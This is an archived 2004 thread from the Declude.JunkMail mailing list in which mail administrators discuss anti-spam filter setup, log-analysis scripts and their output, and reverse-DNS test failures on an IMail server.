settings.) That means that any one using one of those addresses can send out millions of spam e-mails through your server and there is nothing you can do about it. This includes users that may have viruses on their computers, and are now acting as robots. John Tolmachoff Engineer/Consultant/Owner eServices For You --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type "unsubscribe Declude.JunkMail". The archives can be found at http://www.mail-archive.com. -- = MailPure custom filters for Declude JunkMail Pro. http://www.mailpure.com/software/ =
RE: [Declude.JunkMail] New test
That means that any one using one of those addresses can send out millions of spam e-mails through your server and there is nothing you can do about it. How is that statement correct? We scan all outgoing messages for spam and viruses and delete them if a message contains one or both. I made a general warning cautionary warning statement. From the research that Matt did and the fact that you are actively scanning all outgoing messages, you are taking the needed steps to minimize the possible problem. If your IPs are all or mostly used by dialup users, that in itself, as Matt pointed out, greatly reduces the possible problem Again, it was meant as a general warning. John Tolmachoff Engineer/Consultant/Owner eServices For You --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] New test
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of System Administrator Sent: 21. april 2004 20:20 To: [EMAIL PROTECTED] Subject: Re: [Declude.JunkMail] New test on 4/21/04 1:40 PM, John Tolmachoff (Lists) wrote: I assume you are relaying for addresses in Imail SMTP. Correct. That means that any one using one of those addresses can send out millions of spam e-mails through your server and there is nothing you can do about it. How is that statement correct? We scan all outgoing messages for spam and viruses and delete them if a message contains one or both. And how do you can the spam if it's a legitime user? As long as you don't requiere authentication with a user name and password I can send an email through your server as long as I have the correct address. We had the same problem for about 2 years ago Solved it by using the mailall function in Imail giving them a mail that they had to do changes so and so to use our mailserver to send through. Out of 140 000 mailaccounts we had around 150 contacting us by phone the first 2 - 3 days after that it was going as usual. Don't make the problem bigger than it is. Benny --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] Filtering outgoing mail - silent failure
Well I read the manual and searched the archives, but my efforts to filter outgoing mail are not working. We have the pro version of Declude. in the filter... BODY0 CONTAINS flibbertygibbet SUBJECT 0 CONTAINS flibbertygibbet in the Declude config file (last two entries) ... OUTGO filter C:\IMail\Declude\OutgoingFilter.txt x 0 0 OUTGO COPYTO [EMAIL PROTECTED] My first questions would be Does any E-mail fail the OUTGO test? If not, then it is probably an issue with the way the test is set up. You can check the Declude JunkMail log file to see if any E-mail is failing the OUTGO test (you can type 'find OUTGO dec.log' from a command prompt to quickly see if any E-mails failed the test). -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Log analysis and test check scripts
Hi, My log analysis and test check scripts are available for download at: http://www.botany.gu.se/download/decludescript/LOG_analysis.zip http://www.botany.gu.se/download/decludescript/TEST_check.zip The first script creates a list with the number of hits for each test, number of messages that are OK or whitelisted, and a spam summary (incoming messages, deleted spam, held spam, marked spam, non-spam). The second script does a pairwise comparison between a specific test and all other tests regarding number of individual hits and number of shared hits (i.e. messages that fail both tests). Both scripts have two modes, one where the analysis is based on all message hits and another where it is based on unique messages only (i.e. a message hit is only counted once irrespective of the number of recipients). The first mode is much faster, but they can give some interesting results when compared. The scripts run under both Windows NT 4 and Windows 2000. They are pure Windows command scripts and therefore not as fast as some of the other log analysis tools. The analyses below took about one minute each in all mode. /Roger == Output from the log analysis script == Declude test results -- dec0420.log --- Total number of hits -- AHBL-PROXY 4197 AHBL-RHSBL 1296 AHBL-SOURCE 362 BADHEADERS 2523 BASE64-PLUS 381 BASE64 762 CBL 16295 COMMENTS 64 DSBL 14287 DSN 2837 FORGEDLOCAL 685 GREYLIST 6 HELOBOGUS 5812 MAILFROM 1233 MAILPOLICE 902 MESSAGE OK 2672 NETBL 563 OPM 1945 ORDB 48 REVDNS 5752 RSL 1815 SBL 877 SNIFFER-ADULT 2860 SNIFFER-CASINO 44 SNIFFER-CREDIT 685 SNIFFER-EMAIL 87 SNIFFER-EXP 1494 SNIFFER-GEN 1374 SNIFFER-GREY 5 SNIFFER-INSUR 661 SNIFFER-MAL 2 SNIFFER-MEDIA 2437 SNIFFER-OBFUSC 555 SNIFFER-PHARM 5964 SNIFFER-PRINT 10 SNIFFER-RICH 889 SNIFFER-SCAM 107 SNIFFER-TOOLS 1 SNIFFER-TRAVEL 19 SNIFFER 17194 SORBS-DUHL 10199 SPAMCOP 17652 SPAMDOMAINS 3895 SPAMHEADERS 184 SPAMTRAP 150 SPFFAIL 405 SURBL 2761 URLDBL 152 WEIGHT15-19 553 WEIGHT20 18482 WHITELISTED 530 - Total number of messages Incoming: 21154 Held spam: 18482 (87%) Marked spam: 553 (2%) Non-spam: 2119 (10%) == Output from the test check script == Test check results -- dec0420.log --- Test: SBL Total number of hits: 877 --- Shared with AHBL-PROXY (4197 hits): 58 (6%) Shared with AHBL-RHSBL (1296 hits): 137 (15%) Shared with AHBL-SOURCE (362 hits): 314 (35%) Shared with BADHEADERS (2523 hits): 172 (19%) Shared with BASE64-PLUS (381 hits): 13 (1%) Shared with BASE64 (762 hits): 15 (1%) Shared with CBL (16295 hits): 355 (40%) Shared with COMMENTS (64 hits): 6 (0%) Shared with DSBL (14287 hits): 165 (18%) Shared with DSN (2837 hits): 94 (10%) Shared with FORGEDLOCAL (685 hits): 23 (2%) Shared with GREYLIST (6 hits): 0 (0%) Shared with HELOBOGUS (5812 hits): 317 (36%) Shared with MAILFROM (1233 hits): 21 (2%) Shared with MAILPOLICE (902 hits): 371 (42%) Shared with NETBL (563 hits): 15 (1%) Shared with OPM (1945 hits): 2 (0%) Shared with ORDB (48 hits): 0 (0%) Shared with REVDNS (5752 hits): 445 (50%) Shared with RSL (1815 hits): 2 (0%) Shared with SNIFFER-ADULT (2860 hits): 219 (24%) Shared with SNIFFER-CASINO (44 hits): 7 (0%) Shared with SNIFFER-CREDIT (685 hits): 99 (11%) Shared with SNIFFER-EMAIL (87 hits): 82 (9%) Shared with SNIFFER-EXP (1494 hits): 77 (8%) Shared with SNIFFER-GEN (1374 hits): 33 (3%) Shared with SNIFFER-GREY (5 hits): 0 (0%) Shared with SNIFFER-INSUR (661 hits): 39 (4%) Shared with SNIFFER-MAL (2 hits): 0 (0%) Shared with SNIFFER-MEDIA (2437 hits): 32 (3%) Shared with SNIFFER-OBFUSC (555 hits): 30 (3%) Shared with SNIFFER-PHARM (5964 hits): 156 (17%) Shared with SNIFFER-PRINT (10 hits): 9 (1%) Shared with SNIFFER-RICH (889 hits): 84 (9%) Shared with SNIFFER-SCAM (107 hits): 1 (0%) Shared with SNIFFER-TOOLS (1 hits): 1 (0%) Shared with SNIFFER-TRAVEL (19 hits): 2 (0%) Shared with SNIFFER (17194 hits): 871 (99%) Shared with SORBS-DUHL (10199 hits): 197 (22%) Shared with SPAMCOP (17652 hits): 659 (75%) Shared with SPAMDOMAINS (3895 hits): 94 (10%) Shared with SPAMHEADERS (184 hits): 34 (3%) Shared with SPAMTRAP (150 hits): 0 (0%) Shared with SPFFAIL (405 hits): 0 (0%) Shared with SURBL (2761 hits): 20 (2%) Shared with URLDBL (152 hits): 57 (6%) Shared with WEIGHT15-19 (553 hits): 17 (1%) Shared with WEIGHT20 (18482 hits): 860 (98%) --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Any recommendations for MS Exchange spam filter?
Anyone know if there's anything similar to declude for MS Exchange server? thanks, Larry Craddock --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Obvious, but it was new for me
Title: Message I just saved some processing power.. One of my most important text filters is the BODY search for URL stuff. But it's quite big. To keep my loglevels in check, I use LOGLEVEL MID, which doesn't log the individual lines triggered. But whether I use MID or HIGH, the line numbersare only significant if I'm not changing the order, right? So I bottom-post my new filter entries. Back in December, I cutthe big file inhalf, then whenever the short-circuit logic was added, I placed the bottom-most text first in my global.cfg and that helped too. I just gave up on bottom-posting, and LIFO reversed the files. I've definitely noticed that our average CPU usage during our peak periods has gone down. Which tells me that I'll probably want to keep that file smaller and go back to bottom-posting and keep logically named sets of files... The main file is about 1000 entries, all BODY searches. (And no, I'm not going to post it to this list!) Andrew 8)
Re: [Declude.JunkMail] Log analysis and test check scripts
On 21 Apr 2004 at 21:24, Roger Eriksson wrote: *very* nice job Roger - Thanks! -Nick Hayer Hi, My log analysis and test check scripts are available for download at: http://www.botany.gu.se/download/decludescript/LOG_analysis.zip http://www.botany.gu.se/download/decludescript/TEST_check.zip The first script creates a list with the number of hits for each test, number of messages that are OK or whitelisted, and a spam summary (incoming messages, deleted spam, held spam, marked spam, non-spam). The second script does a pairwise comparison between a specific test and all other tests regarding number of individual hits and number of shared hits (i.e. messages that fail both tests). Both scripts have two modes, one where the analysis is based on all message hits and another where it is based on unique messages only (i.e. a message hit is only counted once irrespective of the number of recipients). The first mode is much faster, but they can give some interesting results when compared. The scripts run under both Windows NT 4 and Windows 2000. They are pure Windows command scripts and therefore not as fast as some of the other log analysis tools. The analyses below took about one minute each in all mode. /Roger == Output from the log analysis script == Declude test results -- dec0420.log --- Total number of hits -- AHBL-PROXY 4197 AHBL-RHSBL 1296 AHBL-SOURCE 362 BADHEADERS 2523 BASE64-PLUS 381 BASE64 762 CBL 16295 COMMENTS 64 DSBL 14287 DSN 2837 FORGEDLOCAL 685 GREYLIST 6 HELOBOGUS 5812 MAILFROM 1233 MAILPOLICE 902 MESSAGE OK 2672 NETBL 563 OPM 1945 ORDB 48 REVDNS 5752 RSL 1815 SBL 877 SNIFFER-ADULT 2860 SNIFFER-CASINO 44 SNIFFER-CREDIT 685 SNIFFER-EMAIL 87 SNIFFER-EXP 1494 SNIFFER-GEN 1374 SNIFFER-GREY 5 SNIFFER-INSUR 661 SNIFFER-MAL 2 SNIFFER-MEDIA 2437 SNIFFER-OBFUSC 555 SNIFFER-PHARM 5964 SNIFFER-PRINT 10 SNIFFER-RICH 889 SNIFFER-SCAM 107 SNIFFER-TOOLS 1 SNIFFER-TRAVEL 19 SNIFFER 17194 SORBS-DUHL 10199 SPAMCOP 17652 SPAMDOMAINS 3895 SPAMHEADERS 184 SPAMTRAP 150 SPFFAIL 405 SURBL 2761 URLDBL 152 WEIGHT15-19 553 WEIGHT20 18482 WHITELISTED 530 - Total number of messages Incoming: 21154 Held spam: 18482 (87%) Marked spam: 553 (2%) Non-spam: 2119 (10%) == Output from the test check script == Test check results -- dec0420.log --- Test: SBL Total number of hits: 877 --- Shared with AHBL-PROXY (4197 hits): 58 (6%) Shared with AHBL-RHSBL (1296 hits): 137 (15%) Shared with AHBL-SOURCE (362 hits): 314 (35%) Shared with BADHEADERS (2523 hits): 172 (19%) Shared with BASE64-PLUS (381 hits): 13 (1%) Shared with BASE64 (762 hits): 15 (1%) Shared with CBL (16295 hits): 355 (40%) Shared with COMMENTS (64 hits): 6 (0%) Shared with DSBL (14287 hits): 165 (18%) Shared with DSN (2837 hits): 94 (10%) Shared with FORGEDLOCAL (685 hits): 23 (2%) Shared with GREYLIST (6 hits): 0 (0%) Shared with HELOBOGUS (5812 hits): 317 (36%) Shared with MAILFROM (1233 hits): 21 (2%) Shared with MAILPOLICE (902 hits): 371 (42%) Shared with NETBL (563 hits): 15 (1%) Shared with OPM (1945 hits): 2 (0%) Shared with ORDB (48 hits): 0 (0%) Shared with REVDNS (5752 hits): 445 (50%) Shared with RSL (1815 hits): 2 (0%) Shared with SNIFFER-ADULT (2860 hits): 219 (24%) Shared with SNIFFER-CASINO (44 hits): 7 (0%) Shared with SNIFFER-CREDIT (685 hits): 99 (11%) Shared with SNIFFER-EMAIL (87 hits): 82 (9%) Shared with SNIFFER-EXP (1494 hits): 77 (8%) Shared with SNIFFER-GEN (1374 hits): 33 (3%) Shared with SNIFFER-GREY (5 hits): 0 (0%) Shared with SNIFFER-INSUR (661 hits): 39 (4%) Shared with SNIFFER-MAL (2 hits): 0 (0%) Shared with SNIFFER-MEDIA (2437 hits): 32 (3%) Shared with SNIFFER-OBFUSC (555 hits): 30 (3%) Shared with SNIFFER-PHARM (5964 hits): 156 (17%) Shared with SNIFFER-PRINT (10 hits): 9 (1%) Shared with SNIFFER-RICH (889 hits): 84 (9%) Shared with SNIFFER-SCAM (107 hits): 1 (0%) Shared with SNIFFER-TOOLS (1 hits): 1 (0%) Shared with SNIFFER-TRAVEL (19 hits): 2 (0%) Shared with SNIFFER (17194 hits): 871 (99%) Shared with SORBS-DUHL (10199 hits): 197 (22%) Shared with SPAMCOP (17652 hits): 659 (75%) Shared with SPAMDOMAINS (3895 hits): 94 (10%) Shared with SPAMHEADERS (184 hits): 34 (3%) Shared with SPAMTRAP (150 hits): 0 (0%) Shared with SPFFAIL (405 hits): 0 (0%) Shared with SURBL (2761 hits): 20 (2%) Shared with URLDBL (152 hits): 57 (6%) Shared with WEIGHT15-19 (553 hits): 17 (1%) Shared with WEIGHT20 (18482 hits): 860 (98%) --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. [AUTOMATED NOTE: Your mail server
Re: [Declude.JunkMail] Obvious, but it was new for me
My Body URL observations: I've noticed that using SURBL filter has dramatically cut down on the hits of my 5 URL Body filters. My five filters are for .biz, .info, .com, .net and other, it's just easier for me to maintain them that way. So I've moved the SURBL filter higher in my list of test and the bodyURL's are some of the last tests run. If you run SPAMCHK, it logs out all of the URL's it finds. Scott Fisher Director of IT Farm Progress Companies [EMAIL PROTECTED] 04/21/04 02:52PM I just saved some processing power.. One of my most important text filters is the BODY search for URL stuff. But it's quite big. To keep my loglevels in check, I use LOGLEVEL MID, which doesn't log the individual lines triggered. But whether I use MID or HIGH, the line numbers are only significant if I'm not changing the order, right? So I bottom-post my new filter entries. Back in December, I cut the big file in half, then whenever the short-circuit logic was added, I placed the bottom-most text first in my global.cfg and that helped too. I just gave up on bottom-posting, and LIFO reversed the files. I've definitely noticed that our average CPU usage during our peak periods has gone down. Which tells me that I'll probably want to keep that file smaller and go back to bottom-posting and keep logically named sets of files... The main file is about 1000 entries, all BODY searches. (And no, I'm not going to post it to this list!) Andrew 8) --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
[Declude.JunkMail] Failed Spamdomains Why
Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail but pass the email??? This message failed Spam domains when there was a DNS failure on Microsofts end? Declude Version 1.78i18 *** Declude Log *** 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed REVDNS (This E-mail was sent from a MUA/MTA 207.68.163.152 with no reverse DNS entry.). Action=IGNORE. 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed SPAMDOMAINS (Spamdomain 'hotmail.com' found: Address of [EMAIL PROTECTED] sent from invalid [No Reverse DNS].). Action=IGNORE. *** RDNS Lookup from DNSStuff *** How I am searching: Asking d.root-servers.net for 152.163.68.207.in-addr.arpa PTR record: d.root-servers.net says to go to ginseng.arin.net. (zone: 207.in-addr.arpa.) Asking ginseng.arin.net. for 152.163.68.207.in-addr.arpa PTR record: ginseng.arin.net says to go to dns1.sj.msft.net. (zone: 163.68.207.in-addr.arpa.) Asking dns1.sj.msft.net. for 152.163.68.207.in-addr.arpa PTR record: Error: dns1.sj.msft.net reports a SERVER FAILURE. Answer: An error occurred: Server dns1.sj.msft.net is reporting a server failure (it is probably broken). Details: I could not get to the nameserver authoritative for 152.163.68.207.in-addr.arpa, because one or more of them aren't working properly right now. Sorry! --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
Re: [Declude.JunkMail] Failed Spamdomains Why
Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail but pass the email??? This message failed Spam domains when there was a DNS failure on Microsofts end? It depends on the failure: An error occurred: Server dns1.sj.msft.net is reporting a server failure (it is probably broken). In this case, Declude JunkMail assumes that if it gets a response with no reverse DNS entry in it, that there is no reverse DNS entry. If Microsoft replies and says that its server is broken, well, they do not have a reverse DNS entry. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Failed Spamdomains Why
OK I get that. I was under the assumption that if there was a DNS failure that DNS based tests would not fail. So I am assuming I am correct and Incorrect. If the DNS server that Imail is configureed to communicate with has failed it will pass the tests but if the remote server that is responsible for the RDNS has failed declude treats it like there is no RDNS. Kevin Bilbee -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of R. Scott Perry Sent: Wednesday, April 21, 2004 2:07 PM To: [EMAIL PROTECTED] Subject: Re: [Declude.JunkMail] Failed Spamdomains Why Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail but pass the email??? This message failed Spam domains when there was a DNS failure on Microsofts end? It depends on the failure: An error occurred: Server dns1.sj.msft.net is reporting a server failure (it is probably broken). In this case, Declude JunkMail assumes that if it gets a response with no reverse DNS entry in it, that there is no reverse DNS entry. If Microsoft replies and says that its server is broken, well, they do not have a reverse DNS entry. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] HELOBOGUS, HELOISIP and HELOISIPX questions
OK I think I was somehow reversed in my tinking Goran Jovanovic The LAN Shoppe Goran Jovanovic wrote: This is parts of a header I received and I just want to check a few things So the spammer thought that he would use my IP address in the HELO line 205.150.108.8 to identify his domain, even though his real IP address is 220.185.227.109? Obviously an IP address is not a valid domain so it fails the HELOBOGUS test? It failed the HELOISIP test because the domain was an IP address? Yes. It would be more correct to say that HELOISIP failed because the domain _contained_ an IP address. 205.150.108.8.this.is.a.host.name would also have failed HELOISIP It failed the HELOISIPX test ... not sure why since there is no reverse DNS to parse? It failed HELOISIPX because the host name is a pure IP address. 205.150.108.8.this.is.a.host.name will *not* fail HELOISIPX. In the next release, both tests will not fail host names bracketed IP format [205.150.108.8] -- --- illigitimi non carborundum --- Bud Durland, CNE Mold-Rite Plastics Network Administrator http://www.mrpcap.com --- --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Obvious, but it was new for me
If you run SPAMCHK, it logs out all of the URL's it finds. ...if the Log level is set high enough. Note that it logs any URL regardless if identified as spam or legit message. Markus --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Filtering outgoing mail - silent failure
I sent an email from within our domain (containing that word in both the subject and body) to an external account. Then checked the Declude log. Nothing. That's what I suspected -- that means that there is a problem with the way that the test is set up. Are you sure that the filter file is named the same as the way that it is defined in the global.cfg file? Are you sure that you are running Declude JunkMail Pro (\IMail\Declude -diag from a command prompt will show you)? Is the problem only occurring with the last line in the file (if you cannot move a cursor to the line below it, you need to hit ENTER at the end of the line for Windows to recognize the line)? -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Failed Spamdomains Why
OK I get that. I was under the assumption that if there was a DNS failure that DNS based tests would not fail. If there is a timeout, Declude JunkMail will not fail the test. But if it gets a response back that doesn't include an answer, it will fail the test. -Scott --- Declude JunkMail: The advanced anti-spam solution for IMail mailservers since 2000. Declude Virus: Ultra reliable virus detection and the leader in mailserver vulnerability detection. Find out what you've been missing: Ask for a free 30-day evaluation. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Failed Spamdomains Why
FYI - There is not a DNS failure on Microsoft's end. Microsoft for some reason has no reverse dns for a whole bunch of their mail servers causing mail from MSN and Hotmail to fail both spamdomains and revdns. I have contacted Microsoft and they said it would be fixed yesterday. What a mess. Chuck Schick Warp 8, Inc. 303-421-5140 www.warp8.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of Kevin Bilbee Sent: Wednesday, April 21, 2004 3:04 PM To: [EMAIL PROTECTED] Subject: [Declude.JunkMail] Failed Spamdomains Why Scott I thought if there was a DNS failure that SPAMDOMAINS would not fail but pass the email??? This message failed Spam domains when there was a DNS failure on Microsofts end? Declude Version 1.78i18 *** Declude Log *** 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed REVDNS (This E-mail was sent from a MUA/MTA 207.68.163.152 with no reverse DNS entry.). Action=IGNORE. 04/21/2004 11:36:34 Qbf301a5d024003e8 Msg failed SPAMDOMAINS (Spamdomain 'hotmail.com' found: Address of [EMAIL PROTECTED] sent from invalid [No Reverse DNS].). Action=IGNORE. *** RDNS Lookup from DNSStuff *** How I am searching: Asking d.root-servers.net for 152.163.68.207.in-addr.arpa PTR record: d.root-servers.net says to go to ginseng.arin.net. (zone: 207.in-addr.arpa.) Asking ginseng.arin.net. for 152.163.68.207.in-addr.arpa PTR record: ginseng.arin.net says to go to dns1.sj.msft.net. (zone: 163.68.207.in-addr.arpa.) Asking dns1.sj.msft.net. for 152.163.68.207.in-addr.arpa PTR record: Error: dns1.sj.msft.net reports a SERVER FAILURE. Answer: An error occurred: Server dns1.sj.msft.net is reporting a server failure (it is probably broken). Details: I could not get to the nameserver authoritative for 152.163.68.207.in-addr.arpa, because one or more of them aren't working properly right now. Sorry! --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
RE: [Declude.JunkMail] Obvious, but it was new for me
If you are using Spamchk, you can use an external file there. That is what I do with my body URL filter. It is much quicker to parse from Spamchk than as a filter in Declude. John Tolmachoff Engineer/Consultant/Owner eServices For You -Original Message- From: [EMAIL PROTECTED] [mailto:Declude.JunkMail- [EMAIL PROTECTED] On Behalf Of Scott Fisher Sent: Wednesday, April 21, 2004 1:31 PM To: [EMAIL PROTECTED] Subject: Re: [Declude.JunkMail] Obvious, but it was new for me My Body URL observations: I've noticed that using SURBL filter has dramatically cut down on the hits of my 5 URL Body filters. My five filters are for .biz, .info, .com, .net and other, it's just easier for me to maintain them that way. So I've moved the SURBL filter higher in my list of test and the bodyURL's are some of the last tests run. If you run SPAMCHK, it logs out all of the URL's it finds. Scott Fisher Director of IT Farm Progress Companies [EMAIL PROTECTED] 04/21/04 02:52PM I just saved some processing power.. One of my most important text filters is the BODY search for URL stuff. But it's quite big. To keep my loglevels in check, I use LOGLEVEL MID, which doesn't log the individual lines triggered. But whether I use MID or HIGH, the line numbers are only significant if I'm not changing the order, right? So I bottom-post my new filter entries. Back in December, I cut the big file in half, then whenever the short-circuit logic was added, I placed the bottom-most text first in my global.cfg and that helped too. I just gave up on bottom-posting, and LIFO reversed the files. I've definitely noticed that our average CPU usage during our peak periods has gone down. Which tells me that I'll probably want to keep that file smaller and go back to bottom-posting and keep logically named sets of files... The main file is about 1000 entries, all BODY searches. (And no, I'm not going to post it to this list!) Andrew 8) --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com. --- [This E-mail was scanned for viruses by Declude Virus (http://www.declude.com)] --- This E-mail came from the Declude.JunkMail mailing list. To unsubscribe, just send an E-mail to [EMAIL PROTECTED], and type unsubscribe Declude.JunkMail. The archives can be found at http://www.mail-archive.com.
